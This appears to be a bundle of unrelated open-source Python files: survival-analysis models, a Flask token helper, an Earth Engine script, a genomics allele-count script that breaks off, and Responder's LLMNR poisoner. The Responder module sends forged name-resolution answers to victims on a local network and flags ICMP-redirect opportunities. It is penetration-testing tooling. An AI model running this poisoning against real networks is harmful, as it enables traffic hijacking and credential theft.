* `X` : **array-like**, *shape=(n_samples, n_features)* --
The input samples.
* `T` : **array-like** --
The target values describing when the event of interest or
censoring occurred.
* `E` : **array-like** --
The values that indicate if the event of interest occurred
i.e.: E[i]=1 corresponds to an event, and E[i] = 0 means censoring,
for all i.
* `init_method` : **str** *(default = 'glorot_uniform')* --
Initialization method to use. Here are the possible options:
* `glorot_uniform`: Glorot/Xavier uniform initializer
* `he_uniform`: He uniform variance scaling initializer
* `uniform`: Initializing tensors with uniform (-1, 1) distribution
* `glorot_normal`: Glorot normal initializer,
* `he_normal`: He normal initializer.
* `normal`: Initializing tensors with standard normal distribution
* `ones`: Initializing tensors to 1
* `zeros`: Initializing tensors to 0
* `orthogonal`: Initializing tensors with a orthogonal matrix,
* `lr`: **float** *(default=1e-4)* --
learning rate used in the optimization
* `max_iter`: **int** *(default=100)* --
The maximum number of iterations in the Newton optimization
* `l2_reg`: **float** *(default=1e-4)* --
L2 regularization parameter for the model coefficients
* `alpha`: **float** *(default=0.95)* --
Confidence interval
* `tol`: **float** *(default=1e-3)* --
Tolerance for stopping criteria
* `verbose`: **bool** *(default=True)* --
Whether or not producing detailed logging about the modeling
Example:
--------
#### 1 - Importing packages
import numpy as np
import pandas as pd
from matplotlib import pyplot as plt
from sklearn.model_selection import train_test_split
from pysurvival.models.simulations import SimulationModel
from pysurvival.models.semi_parametric import CoxPHModel
from pysurvival.utils.metrics import concordance_index
from pysurvival.utils.display import integrated_brier_score
#%pylab inline # To use with Jupyter notebooks
#### 2 - Generating the dataset from a Log-Logistic parametric model
# Initializing the simulation model
sim = SimulationModel( survival_distribution = 'log-logistic',
risk_type = 'linear',
censored_parameter = 10.1,
alpha = 0.1, beta=1.2 )
# Generating N random samples
N = 1000
dataset = sim.generate_data(num_samples = N, num_features = 3)
#### 3 - Creating the modeling dataset
# Defining the features
features = sim.features
# Building training and testing sets #
index_train, index_test = train_test_split( range(N), test_size = 0.2)
data_train = dataset.loc[index_train].reset_index( drop = True )
data_test = dataset.loc[index_test].reset_index( drop = True )
# Creating the X, T and E input
X_train, X_test = data_train[features], data_test[features]
T_train, T_test = data_train['time'].values, data_test['time'].values
E_train, E_test = data_train['event'].values, data_test['event'].values
#### 4 - Creating an instance of the Cox PH model and fitting the data.
# Building the model
coxph = CoxPHModel()
coxph.fit(X_train, T_train, E_train, lr=0.5, l2_reg=1e-2,
init_method='zeros')
#### 5 - Cross Validation / Model Performances
c_index = concordance_index(coxph, X_test, T_test, E_test) #0.92
print('C-index: {:.2f}'.format(c_index))
ibs = integrated_brier_score(coxph, X_test, T_test, E_test, t_max=10,
figure_size=(20, 6.5) )
References:
-----------
* https://en.wikipedia.org/wiki/Proportional_hazards_model#Tied_times
* Efron, Bradley (1974). "The Efficiency of Cox's Likelihood
Function for Censored Data". Journal of the American Statistical
Association. 72 (359): 557-565.
"""
# Collecting features names
N, self.num_vars = X.shape
if isinstance(X, pd.DataFrame):
self.variables = X.columns.tolist()
else:
self.variables = ['x_{}'.format(i) for i in range(self.num_vars)]
# Checking the format of the data
X, T, E = utils.check_data(X, T, E)
order = np.argsort(-T)
T = T[order]
E = E[order]
X = self.scaler.fit_transform( X[order, :] )
self.std_scale = np.sqrt( self.scaler.var_ )
# Initializing the model
self.model = _CoxPHModel()
# Creating the time axis
self.model.get_times(T, E)
# Initializing the parameters
W = np.zeros(self.num_vars)
W = opt.initialization(init_method, W, False).flatten()
W = W.astype(np.float64)
# Optimizing to find best parameters
epsilon=1e-9
self.model.newton_optimization(X, T, E, W, lr, l2_reg, tol, epsilon,
max_iter, verbose)
# Saving the Cython attributes in the Python object
self.weights = np.array( self.model.W )
self.loss = self.model.loss
self.times = np.array( self.model.times)
self.gradient = np.array( self.model.gradient )
self.Hessian = np.array( self.model.Hessian )
self.inv_Hessian = np.array( self.model.inv_Hessian )
self.loss_values = np.array( self.model.loss_values )
self.grad2_values = np.array( self.model.grad2_values )
# Computing baseline functions
score = np.exp( np.dot(X, self.weights) )
baselines = _baseline_functions(score, T, E)
# Saving the Cython attributes in the Python object
self.baseline_hazard = np.array( baselines[1] )
self.baseline_survival = np.array( baselines[2] )
del self.model
self.get_time_buckets()
# Calculating summary
self.get_summary(alpha)
return self
def predict(self, x, t = None):
"""
Predicting the hazard, density and survival functions
Arguments:
* x: pd.Dataframe or np.ndarray or list
x is the testing dataset containing the features
x should not be standardized before, the model
will take care of it
* t: float (default=None)
Time at which hazard, density and survival functions
should be calculated. If None, the method returns
the functions for all times t.
"""
# Convert x into the right format
x = utils.check_data(x)
# Sacling the dataset
if x.ndim == 1:
x = self.scaler.transform( x.reshape(1, -1) )
elif x.ndim == 2:
x = self.scaler.transform( x )
# Calculating risk_score, hazard, density and survival
phi = np.exp( np.dot(x, self.weights) )
hazard = self.baseline_hazard*phi.reshape(-1, 1)
survival = np.power(self.baseline_survival, phi.reshape(-1, 1))
density = hazard*survival
if t is None:
return hazard, density, survival
else:
min_index = [ abs(a_j_1-t) for (a_j_1, a_j) in self.time_buckets ]
index = np.argmin(min_index)
return hazard[:, index], density[:, index], survival[:, index]
def predict_risk(self, x, use_log = False):
"""
Predicting the risk score functions
Arguments:
* x: pd.Dataframe or np.ndarray or list
x is the testing dataset containing the features
x should not be standardized before, the model
will take care of it
"""
# Convert x into the right format
x = utils.check_data(x)
# Scaling the dataset
if x.ndim == 1:
x = self.scaler.transform( x.reshape(1, -1) )
elif x.ndim == 2:
x = self.scaler.transform( x )
# Calculating risk_score
risk_score = np.exp( np.dot(x, self.weights) )
if not use_log:
risk_score = np.exp(risk_score)
return risk_score
class NonLinearCoxPHModel(BaseModel):
""" NonLinear Cox Proportional Hazard model (NeuralCoxPH)
The original Cox Proportional Hazard model, was first introduced
by David R Cox in `Regression models and life-tables`.
The NonLinear CoxPH model was popularized by Katzman et al.
in `DeepSurv: Personalized Treatment Recommender System Using
A Cox Proportional Hazards Deep Neural Network` by allowing the use of
Neural Networks within the original design.
This current adaptation of the model differs from DeepSurv
as it uses the Efron's method to take ties into account.
Parameters
----------
* structure: None or list of dictionaries
Provides an MLP structure within the CoxPH
If None, then the model becomes the Linear CoxPH
ex: structure = [ {'activation': 'relu', 'num_units': 128},
{'activation': 'tanh', 'num_units': 128}, ]
Here are the possible activation functions:
* Atan
* BentIdentity
* BipolarSigmoid
* CosReLU
* ELU
* Gaussian
* Hardtanh
* Identity
* InverseSqrt
* LeakyReLU
* LeCunTanh
* LogLog
* LogSigmoid
* ReLU
* SELU
* Sigmoid
* Sinc
* SinReLU
* Softmax
* Softplus
* Softsign
* Swish
* Tanh
* auto_scaler: boolean (default=True)
Determines whether a sklearn scaler should be automatically
applied
"""
def __init__(self, structure=None, auto_scaler = True):
# Saving attributes
self.structure = structure
self.loss_values = []
# Initializing the elements from BaseModel
super(NonLinearCoxPHModel, self).__init__(auto_scaler)
def risk_fail_matrix(self, T, E):
""" Calculating the Risk, Fail matrices to calculate the loss
function by vectorizing all the quantities at stake
"""
N = T.shape[0]
Risk = np.zeros( (self.nb_times, N) )
Fail = np.zeros( (self.nb_times, N) )
for i in range(N):
# At risk
index_risk = np.argwhere( self.times <= T[i] ).flatten()
Risk[ index_risk, i] = 1.
# Failed
if E[i] == 1 :
index_fail = np.argwhere( self.times == T[i] )[0]
Fail[index_fail, i] = 1.
self.nb_fail_per_time = np.sum( Fail, axis = 1 ).astype(int)
return torch.FloatTensor(Risk), torch.FloatTensor(Fail)
def efron_matrix(self):
""" Computing the Efron Coefficient matrices to calculate the loss
function by vectorizing all the quantities at stake
"""
max_nb_fails = int(max(self.nb_fail_per_time))
Efron_coef = np.zeros( (self.nb_times, max_nb_fails ) )
Efron_one = np.zeros( (self.nb_times, max_nb_fails ) )
Efron_anti_one = np.ones( (self.nb_times, max_nb_fails ) )
for i, d in enumerate(self.nb_fail_per_time) :
if d > 0:
Efron_coef[i, :d] = [ h*1.0/d for h in range( d )]
Efron_one [i, :d] = 1.
Efron_anti_one[i, :d] = 0.
Efron_coef = torch.FloatTensor(Efron_coef)
Efron_one = torch.FloatTensor(Efron_one)
Efron_anti_one = torch.FloatTensor(Efron_anti_one)
return Efron_coef, Efron_one, Efron_anti_one
def loss_function(self, model, X, Risk, Fail,
Efron_coef, Efron_one, Efron_anti_one, l2_reg):
""" Efron's approximation loss function by vectorizing
all the quantities at stake
"""
# Calculating the score
pre_score = model(X)
score = torch.reshape( torch.exp(pre_score), (-1, 1) )
max_nb_fails = Efron_coef.shape[1]
# Numerator calculation
log_score = torch.log( score )
log_fail = torch.mm(Fail, log_score)
numerator = torch.sum(log_fail)
# Denominator calculation
risk_score = torch.reshape( torch.mm(Risk, score), (-1,1) )
risk_score = risk_score.repeat(1, max_nb_fails)
fail_score = torch.reshape( torch.mm(Fail, score), (-1,1) )
fail_score = fail_score.repeat(1, max_nb_fails)
Efron_Fail = fail_score*Efron_coef
Efron_Risk = risk_score*Efron_one
log_efron = torch.log( Efron_Risk - Efron_Fail + Efron_anti_one)
denominator = torch.sum( torch.sum(log_efron, dim=1) )
# Adding regularization
loss = - (numerator - denominator)
for w in model.parameters():
loss += l2_reg*torch.sum(w*w)/2.
return loss
def fit(self, X, T, E, init_method = 'glorot_uniform',
optimizer ='adam', lr = 1e-4, num_epochs = 1000,
dropout = 0.2, batch_normalization=False, bn_and_dropout=False,
l2_reg=1e-5, verbose=True):
"""
Fit the estimator based on the given parameters.
Parameters:
-----------
* `X` : **array-like**, *shape=(n_samples, n_features)* --
The input samples.
* `T` : **array-like** --
The target values describing when the event of interest or censoring
occurred.
* `E` : **array-like** --
The values that indicate if the event of interest occurred i.e.:
E[i]=1 corresponds to an event, and E[i] = 0 means censoring,
for all i.
* `init_method` : **str** *(default = 'glorot_uniform')* --
Initialization method to use. Here are the possible options:
* `glorot_uniform`: Glorot/Xavier uniform initializer
* `he_uniform`: He uniform variance scaling initializer
* `uniform`: Initializing tensors with uniform (-1, 1) distribution
* `glorot_normal`: Glorot normal initializer,
* `he_normal`: He normal initializer.
* `normal`: Initializing tensors with standard normal distribution
* `ones`: Initializing tensors to 1
* `zeros`: Initializing tensors to 0
* `orthogonal`: Initializing tensors with a orthogonal matrix,
* `optimizer`: **str** *(default = 'adam')* --
iterative method for optimizing a differentiable objective function.
Here are the possible options:
- `adadelta`
- `adagrad`
- `adam`
- `adamax`
- `rmsprop`
- `sparseadam`
- `sgd`
* `lr`: **float** *(default=1e-4)* --
learning rate used in the optimization
* `num_epochs`: **int** *(default=1000)* --
The number of iterations in the optimization
* `dropout`: **float** *(default=0.5)* --
Randomly sets a fraction rate of input units to 0
at each update during training time, which helps prevent overfitting.
* `l2_reg`: **float** *(default=1e-4)* --
L2 regularization parameter for the model coefficients
* `batch_normalization`: **bool** *(default=True)* --
Applying Batch Normalization or not
* `bn_and_dropout`: **bool** *(default=False)* --
Applying Batch Normalization and Dropout at the same time
* `verbose`: **bool** *(default=True)* --
Whether or not producing detailed logging about the modeling
Example:
--------
#### 1 - Importing packages
import numpy as np
import pandas as pd
from matplotlib import pyplot as plt
from sklearn.model_selection import train_test_split
from pysurvival.models.simulations import SimulationModel
from pysurvival.models.semi_parametric import NonLinearCoxPHModel
from pysurvival.utils.metrics import concordance_index
from pysurvival.utils.display import integrated_brier_score
#%matplotlib inline # To use with Jupyter notebooks
#### 2 - Generating the dataset from a nonlinear Weibull parametric model
# Initializing the simulation model
sim = SimulationModel( survival_distribution = 'weibull',
risk_type = 'Gaussian',
censored_parameter = 2.1,
alpha = 0.1, beta=3.2 )
# Generating N random samples
N = 1000
dataset = sim.generate_data(num_samples = N, num_features=3)
# Showing a few data-points
dataset.head(2)
#### 3 - Creating the modeling dataset
# Defining the features
features = sim.features
# Building training and testing sets #
index_train, index_test = train_test_split( range(N), test_size = 0.2)
data_train = dataset.loc[index_train].reset_index( drop = True )
data_test = dataset.loc[index_test].reset_index( drop = True )
# Creating the X, T and E input
X_train, X_test = data_train[features], data_test[features]
T_train, T_test = data_train['time'].values, data_test['time'].values
E_train, E_test = data_train['event'].values, data_test['event'].values
#### 4 - Creating an instance of the NonLinear CoxPH model and fitting
# the data.
# Defining the MLP structure. Here we will build a 1-hidden layer
# with 150 units and `BentIdentity` as its activation function
structure = [ {'activation': 'BentIdentity', 'num_units': 150}, ]
# Building the model
nonlinear_coxph = NonLinearCoxPHModel(structure=structure)
nonlinear_coxph.fit(X_train, T_train, E_train, lr=1e-3,
init_method='xav_uniform')
#### 5 - Cross Validation / Model Performances
c_index = concordance_index(nonlinear_coxph, X_test, T_test, E_test)
print('C-index: {:.2f}'.format(c_index))
ibs = integrated_brier_score(nonlinear_coxph, X_test, T_test, E_test,
t_max=10, figure_size=(20, 6.5) )
"""
# Checking data format (i.e.: transforming into numpy array)
X, T, E = utils.check_data(X, T, E)
# Extracting data parameters
N, self.num_vars = X.shape
input_shape = self.num_vars
# Scaling data
if self.auto_scaler:
X_original = self.scaler.fit_transform( X )
# Sorting X, T, E in descending order according to T
order = np.argsort(-T)
T = T[order]
E = E[order]
X_original = X_original[order, :]
self.times = np.unique(T[E.astype(bool)])
self.nb_times = len(self.times)
self.get_time_buckets()
# Initializing the model
model = nn.NeuralNet(input_shape, 1, self.structure,
init_method, dropout, batch_normalization,
bn_and_dropout )
# Looping through the data to calculate the loss
X = torch.FloatTensor(X_original)
# Computing the Risk and Fail tensors
Risk, Fail = self.risk_fail_matrix(T, E)
Risk = torch.FloatTensor(Risk)
Fail = torch.FloatTensor(Fail)
# Computing Efron's matrices
Efron_coef, Efron_one, Efron_anti_one = self.efron_matrix()
Efron_coef = torch.FloatTensor(Efron_coef)
Efron_one = torch.FloatTensor(Efron_one)
Efron_anti_one = torch.FloatTensor(Efron_anti_one)
# Performing order 1 optimization
model, loss_values = opt.optimize(self.loss_function, model, optimizer,
lr, num_epochs, verbose, X=X, Risk=Risk, Fail=Fail,
Efron_coef=Efron_coef, Efron_one=Efron_one,
Efron_anti_one=Efron_anti_one, l2_reg=l2_reg)
# Saving attributes
self.model = model.eval()
self.loss_values = loss_values
# Computing baseline functions
x = X_original
x = torch.FloatTensor(x)
# Calculating risk_score
score = np.exp(self.model(torch.FloatTensor(x)).data.numpy().flatten())
baselines = _baseline_functions(score, T, E)
# Saving the Cython attributes in the Python object
self.times = np.array( baselines[0] )
self.baseline_hazard = np.array( baselines[1] )
self.baseline_survival = np.array( baselines[2] )
return self
def predict(self, x, t = None):
"""
Predicting the hazard, density and survival functions
Arguments:
* x: pd.Dataframe or np.ndarray or list
x is the testing dataset containing the features
x should not be standardized before, the model
will take care of it
* t: float (default=None)
Time at which hazard, density and survival functions
should be calculated. If None, the method returns
the functions for all times t.
"""
# Convert x into the right format
x = utils.check_data(x)
# Scaling the dataset
if x.ndim == 1:
x = self.scaler.transform( x.reshape(1, -1) )
elif x.ndim == 2:
x = self.scaler.transform( x )
# Calculating risk_score, hazard, density and survival
score = self.model(torch.FloatTensor(x)).data.numpy().flatten()
phi = np.exp( score )
hazard = self.baseline_hazard*phi.reshape(-1, 1)
survival = np.power(self.baseline_survival, phi.reshape(-1, 1))
density = hazard*survival
if t is None:
return hazard, density, survival
else:
min_index = [ abs(a_j_1-t) for (a_j_1, a_j) in self.time_buckets ]
index = np.argmin(min_index)
return hazard[:, index], density[:, index], survival[:, index]
def predict_risk(self, x, use_log = False):
"""
Predicting the risk score functions
Arguments:
* x: pd.Dataframe or np.ndarray or list
x is the testing dataset containing the features
x should not be standardized before, the model
will take care of it
"""
# Convert x into the right format
x = utils.check_data(x)
# Scaling the data
if self.auto_scaler:
if x.ndim == 1:
x = self.scaler.transform( x.reshape(1, -1) )
elif x.ndim == 2:
x = self.scaler.transform( x )
else:
# Ensuring x has 2 dimensions
if x.ndim == 1:
x = np.reshape(x, (1, -1))
# Transforming into pytorch objects
x = torch.FloatTensor(x)
# Calculating risk_score
score = self.model(x).data.numpy().flatten()
if not use_log:
score = np.exp(score)
return score
def __repr__(self):
""" Representing the class object """
if self.structure is None:
super(NonLinearCoxPHModel, self).__repr__()
return self.name
else:
S = len(self.structure)
self.name = self.__class__.__name__
empty = len(self.name)
self.name += '( '
for i, s in enumerate(self.structure):
n = 'Layer({}): '.format(i+1)
activation = nn.activation_function(s['activation'],
return_text=True)
n += 'activation = {}, '.format( s['activation'] )
n += 'num_units = {} '.format( s['num_units'] )
if i != S-1:
self.name += n + '; \n'
self.name += empty*' ' + ' '
else:
self.name += n
self.name += ')'
return self.name
| square/pysurvival | pysurvival/models/semi_parametric.py | Python | apache-2.0 | 28,318 |
import os
from app import create_app
from itsdangerous import URLSafeTimedSerializer
app = create_app(os.environ['APP_CONFIG'])
def generate_confirmation_token(email):
serializer = URLSafeTimedSerializer(app.config['SECRET_KEY'])
return serializer.dumps(email, salt = app.config['PASSWORD_SALT'])
def confirm_token(token, expiration=604800):
serializer = URLSafeTimedSerializer(app.config['SECRET_KEY'])
try:
email = serializer.loads(token, salt = app.config['PASSWORD_SALT'], max_age = expiration)
except:
return False
return email
def confirm_request(token, expiration=259200):
serializer = URLSafeTimedSerializer(app.config['SECRET_KEY'])
try:
email = serializer.loads(token, salt = app.config['PASSWORD_SALT'], max_age = expiration)
except:
return False
return email
| andMYhacks/infosec_mentors_project | app/token.py | Python | gpl-3.0 | 848 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import ee
import json
import sys
import time
class ExportGeeAssetsStatus(object):
options = {
'assets': {
'mosaico': 'projects/mapbiomas-workspace/MOSAICOS/workspace',
'classificacao': 'projects/mapbiomas-workspace/COLECAO2_1/classificacao',
'classificacao-ft': 'projects/mapbiomas-workspace/COLECAO2_1/classificacao-ft'
}
}
def __init__(self, options=None):
if options != None:
self.options.update(options)
ee.Initialize()
def listGroupAssets(self, bioma=None):
"""
Dicionario de task_ids das imagens processados e temporarias agrupadas por coleçao
"""
results = {}
results['mosaico'] = self.listByProcessedStatus(self.options['assets']['mosaico'], bioma)
time.sleep(1)
results['classificacao'] = self.listByProcessedStatus(self.options['assets']['classificacao'], bioma)
time.sleep(1)
results['classificacao-ft'] = self.listByProcessedStatus(self.options['assets']['classificacao-ft'], bioma)
time.sleep(1)
return results
def listByProcessedStatus(self, collection_id, bioma=None):
"""
Lista task_id das imagens processados e temporarias da coleçao requisitada
Keyword arguments:
collection_id -- endereço do assets da coleção
"""
img_collection = ee.ImageCollection(collection_id).filterMetadata('task_id', 'not_equals', None)
if bioma != None:
img_collection = img_collection.filterMetadata('biome', 'equals', bioma)
# lista de imagens da coleção
img_list = img_collection.toList(20000)
# mapea a lista de imagens para lista de id e taskis
img_taskid_list = img_list.map(lambda img: self.__map_img_taskid(img))
# baixa lista do earthengine
dataall = img_taskid_list.getInfo()
# filtra imagens processadas e temp
data = filter(lambda imgdata: imgdata[
'id'].find('_temp') == -1, dataall)
data_temp = filter(lambda imgdata: imgdata[
'id'].find('_temp') >= 0, dataall)
# mapea listas com somente task_id
data_task_ids = map(lambda imgdata: int(imgdata['task_id']), data)
data_temp_task_ids = map(
lambda imgdata: int(imgdata['task_id']), data_temp)
# retorna dicionario com task_id processados e temporarios separados
return {'processed': data_task_ids, 'temp': data_temp_task_ids}
def __map_img_taskid(self, img):
"""
Retorna id e task_id da img informada
Keyword arguments:
img -- ee.BaseAlgorith da imagem
"""
eeimg = ee.Image(img)
return {'id': eeimg.id(), 'task_id': eeimg.get('task_id')}
if __name__ == '__main__':
params = sys.argv
bioma = None
try:
bioma = params[1]
except expression:
bioma = None
exportstatus = ExportGeeAssetsStatus()
print(json.dumps(exportstatus.listGroupAssets(bioma)))
| TerrasAppSolutions/seeg-mapbiomas-workspace | app/Console/Scripts/export_gee_assets_status.py | Python | mit | 3,165 |
#!/usr/bin/env python
# This file is part of Responder, a network take-over set of tools
# created and maintained by Laurent Gaffie.
# email: laurent.gaffie@gmail.com
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import fingerprint
from packets import LLMNR_Ans
from utils import *
if (sys.version_info > (3, 0)):
from socketserver import BaseRequestHandler
else:
from SocketServer import BaseRequestHandler
def Parse_LLMNR_Name(data):
import codecs
NameLen = data[12]
if (sys.version_info > (3, 0)):
return data[13:13+NameLen]
else:
NameLen2 = int(codecs.encode(NameLen, 'hex'), 16)
return data[13:13+int(NameLen2)]
def IsICMPRedirectPlausible(IP):
dnsip = []
with open('/etc/resolv.conf', 'r') as file:
for line in file:
ip = line.split()
if len(ip) < 2:
continue
elif ip[0] == 'nameserver':
dnsip.extend(ip[1:])
for x in dnsip:
if x != "127.0.0.1" and IsOnTheSameSubnet(x,IP) is False:
print(color("[Analyze mode: ICMP] You can ICMP Redirect on this network.", 5))
print(color("[Analyze mode: ICMP] This workstation (%s) is not on the same subnet than the DNS server (%s)." % (IP, x), 5))
print(color("[Analyze mode: ICMP] Use `python tools/Icmp-Redirect.py` for more details.", 5))
if settings.Config.AnalyzeMode:
IsICMPRedirectPlausible(settings.Config.Bind_To)
class LLMNR(BaseRequestHandler): # LLMNR Server class
def handle(self):
try:
data, soc = self.request
Name = Parse_LLMNR_Name(data).decode("latin-1")
# Break out if we don't want to respond to this host
if RespondToThisHost(self.client_address[0], Name) is not True:
return None
if data[2:4] == b'\x00\x00' and Parse_IPV6_Addr(data):
Finger = None
if settings.Config.Finger_On_Off:
Finger = fingerprint.RunSmbFinger((self.client_address[0], 445))
if settings.Config.AnalyzeMode:
LineHeader = "[Analyze mode: LLMNR]"
print(color("%s Request by %s for %s, ignoring" % (LineHeader, self.client_address[0], Name), 2, 1))
SavePoisonersToDb({
'Poisoner': 'LLMNR',
'SentToIp': self.client_address[0],
'ForName': Name,
'AnalyzeMode': '1',
})
else: # Poisoning Mode
Buffer1 = LLMNR_Ans(Tid=NetworkRecvBufferPython2or3(data[0:2]), QuestionName=Name, AnswerName=Name)
Buffer1.calculate()
soc.sendto(NetworkSendBufferPython2or3(Buffer1), self.client_address)
LineHeader = "[*] [LLMNR]"
print(color("%s Poisoned answer sent to %s for name %s" % (LineHeader, self.client_address[0], Name), 2, 1))
SavePoisonersToDb({
'Poisoner': 'LLMNR',
'SentToIp': self.client_address[0],
'ForName': Name,
'AnalyzeMode': '0',
})
if Finger is not None:
print(text("[FINGER] OS Version : %s" % color(Finger[0], 3)))
print(text("[FINGER] Client Version : %s" % color(Finger[1], 3)))
except:
raise
| snar5/Responder | poisoners/LLMNR.py | Python | gpl-3.0 | 3,475 |
# Big Data Smart Socket
# Copyright (C) 2016 Clemson University
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
from ..transfer.mechanisms import available_mechanisms
cli_help = "List transfer mechanisms available on this machine."
def configure_parser(parser):
pass
def handle_action(args, parser):
for m in available_mechanisms():
print(m)
| feltus/BDSS | client/client/actions/mechanisms_action.py | Python | gpl-2.0 | 1,025 |
#!/usr/bin/env python
#coding: utf-8
#### FUNCTIONS ####
def header(string):
"""
Display header
"""
timeInfo = time.strftime("%Y-%m-%d %H:%M")
print '\n', timeInfo, "****", string, "****"
def subHeader(string):
"""
Display subheader
"""
timeInfo = time.strftime("%Y-%m-%d %H:%M")
print timeInfo, "**", string, "**"
def info(string):
"""
Display basic information
"""
timeInfo = time.strftime("%Y-%m-%d %H:%M")
print timeInfo, string
#### MAIN ####
## Import modules ##
import argparse
import sys
import os.path
import formats
import time
import scipy.stats as stats
import pandas as pd
import numpy as np
from matplotlib import pyplot as plt
import seaborn as sns
## Graphic style ##
sns.set_style("white")
sns.set_style("ticks")
## Get user's input ##
parser = argparse.ArgumentParser(description= """""")
parser.add_argument('inputVCF', help='Multisample VCF with genotyped source elemetns')
parser.add_argument('metadata', help='Text file with the project and ancestry code per donor Id')
parser.add_argument('-o', '--outDir', default=os.getcwd(), dest='outDir', help='output directory. Default: current working directory.' )
args = parser.parse_args()
inputVCF = args.inputVCF
metadata = args.metadata
outDir = args.outDir
scriptName = os.path.basename(sys.argv[0])
## Display configuration to standard output ##
print
print "***** ", scriptName, " configuration *****"
print "inputVCF: ", inputVCF
print "metadata: ", metadata
print "outDir: ", outDir
print
print "***** Executing ", scriptName, ".... *****"
print
## Start ##
#### 1. Read input multi-sample VCF and generate a VCF object
#############################################################
header("1. Process multi-sample VCF as input")
VCFObj = formats.VCF()
donorIdList = VCFObj.read_VCF_multiSample(inputVCF)
#### 2. Read metadata file
##########################
# Initialize three dictionaries with the following structure:
# - dict1a: key(ancestryCode) -> dict1b: key(donorId) -> nbSourceElements
# - dict2a: key(donorId) -> ancestryCode
# - dict3a: key(donorId) -> projectCode
# - dict4a: key(ancestryCode) -> Total number of chromosome copies in the population (number of individuals with a given ancestry * 2 chromosomes)
header("2. Read ancestry codes file")
metadataFile = open(metadata, 'r')
nbSourceElementsDict = {}
donorIdAncestryDict = {}
donorIdProjectCodeDict = {}
ancestryTotalAlleleCountDict = {}
for line in metadataFile:
line = line.rstrip('\r\n')
# Skip header
if not line.startswith("#"):
line = line.split('\t')
donorId = line[0]
tumorType = line[1]
ancestryCode = line[2]
### Dict1a and Dict1b
if ancestryCode not in nbSourceElementsDict:
# Create dictionary
nbSourceElementsDict[ancestryCode] = {}
# Initialize to 0 values:
nbSourceElementsDict[ancestryCode][donorId] = 0
### dict2a
donorIdAncestryDict[donorId] = ancestryCode
### dict3a
donorIdProjectCodeDict[donorId] = tumorType
### dict4a
# Initialize ancestry counter
if ancestryCode not in ancestryTotalAlleleCountDict:
ancestryTotalAlleleCountDict[ancestryCode] = 1
# Update counter
else:
ancestryTotalAlleleCountDict[ancestryCode] += 1
print "nbDonors-ancestry: ", ancestryTotalAlleleCountDict
## Multiply by 2 the number of donors per ancestry to obtain the total allele count:
for ancestry in ancestryTotalAlleleCountDict:
ancestryTotalAlleleCountDict[ancestry] = ancestryTotalAlleleCountDict[ancestry] * 2
print "total-alleleCount-ancestry: ", ancestryTotalAlleleCountDict
#### 3. Compute parameters
##########################
# - Number of source elements per donor. Donors classified according to their ancestry
# - Global allele counts per source element across full PCAWG cohort
# - Variant allele counts per source element and per tumor type == Source elements load per tumor type
# - Variant allele frequencies per source element and ancestry == Source elements load per ancestry (to do)
## Store info in three dictionaries:
# globalAlleleFreqDict - dict4a: key(sourceElementId) -> allele frequency across full PCAWG cohort
# alleleCountPerTumorDict - dict5a: key(sourceElementId) -> dict5b: key(projectCode) -> allele Count
# alleleCountPerAncestryDict - dict6a: key(sourceElementId) -> dict6b: key(ancestryCode) -> allele Count
# alleleFreqPerAncestryDict - dict7a: key(sourceElementId) -> dict7b: key(ancestryCode) -> allele frequency
globalAlleleFreqDict = {}
alleleCountPerTumorDict = {}
alleleCountPerAncestryDict = {}
alleleFreqPerAncestryDict = {}
header("3. Compute parameters")
# Open output file
outFilePath = outDir + '/germline_source_element_alleleCount_VAF.tsv'
outFile = open(outFilePath, 'a')
# Write header:
row = '#SourceElement' + "\t" + 'alleleCount' + "\t" + 'VAF' + "\n"
outFile.write(row)
## For each MEI:
for MEIObj in VCFObj.lineList:
end = (MEIObj.infoDict["BKPB"] if "BKPB" in MEIObj.infoDict else "UNK")
sourceElementId = MEIObj.chrom + ':' + str(MEIObj.pos) + '-' + str(end)
print "** source element ** ", sourceElementId
## Initialize Dict5a and dict7a for source element
alleleCountPerTumorDict[sourceElementId] = {}
alleleFreqPerAncestryDict[sourceElementId] = {}
# Initialize allele count per project code to 0 values:
for projectCode in donorIdProjectCodeDict.values():
alleleCountPerTumorDict[sourceElementId][projectCode] = 0
## Initialize Dict6a for source element
alleleCountPerAncestryDict[sourceElementId] = {}
# Initialize allele count per ancestry to 0 values:
for ancestry in ancestryTotalAlleleCountDict:
alleleCountPerAncestryDict[sourceElementId][ancestry] = 0
#print "Initialized-dict1: ", alleleCountPerTumorDict
#print "Initialized-dict2: ", alleleCountPerAncestryDict
## Total number of chromosome copies in the population
# Number of donors * 2 (diploid, two copies of a given chromosome)
totalNbChrom = len(MEIObj.genotypesDict) * 2
#print "total-nb-copies: ", totalNbChrom
## For each donor genotype:
alleleCount = 0
for donorId, genotypeField in MEIObj.genotypesDict.iteritems():
ancestryCode = donorIdAncestryDict[donorId]
projectCode = donorIdProjectCodeDict[donorId]
genotypeFieldList = genotypeField.split(":")
genotype = genotypeFieldList[0]
#### Update counters and store VAF values
## A) Insertion absent in reference genome
if (MEIObj.alt == "<MEI>"):
# print "Insertion absent in reference genome", donorId, genotype, projectCode
# a) Heterozygous
if (genotype == "0/1"):
# print "ancestryCode: ", ancestryCode
nbSourceElementsDict[ancestryCode][donorId] += 1
alleleCount += 1
alleleCountPerTumorDict[sourceElementId][projectCode] += 1
alleleCountPerAncestryDict[sourceElementId][ancestryCode] += 1
# print "alleleCount: ", alleleCount
# print "alleleCount-ProjectCode: ", alleleCountPerTumorDict[sourceElementId][projectCode]
# print "alleleCount-ancestry: ", alleleCountPerAncestryDict[sourceElementId][ancestryCode]
# b) Homozygous alternative
elif (genotype == "1/1"):
# print "ancestryCode: ", ancestryCode
nbSourceElementsDict[ancestryCode][donorId] += 1
